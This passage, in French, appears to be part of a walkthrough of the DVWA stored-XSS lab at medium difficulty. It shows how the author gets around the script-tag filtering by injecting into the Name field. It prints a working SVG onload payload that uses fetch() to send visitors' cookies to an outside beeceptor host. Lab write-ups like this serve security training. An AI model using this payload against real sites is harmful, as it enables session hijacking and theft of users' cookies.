Niveau "Medium"
Pas de changement sur le guestbook :

Il n'est pas possible ici d'exécuter une popup alert()
simplement. En effet, les balises <script>
</script>
semblent être filtrées et le champ "Message" semble également échapper le caractère """
(et donc sans doute également le caractère "'"
) :

Je vais me concentrer sur le champ "Name" étant donné qu'il semble être plus permissif. Je tente tout d'abord de passer par une autre balise afin d'exécuter notre javascript :

Cela fonctionne. Il me reste plus qu'à améliorer ma payload afin de récupérer les cookies des visiteurs :
<svg onload="fetch('https://dvwaxssrefl.free.beeceptor.com?cookie=' + document.cookie);">

L'attaque fonctionne, le cookie du visiteur est envoyé vers mon serveur malicieux :

Dernière mise à jour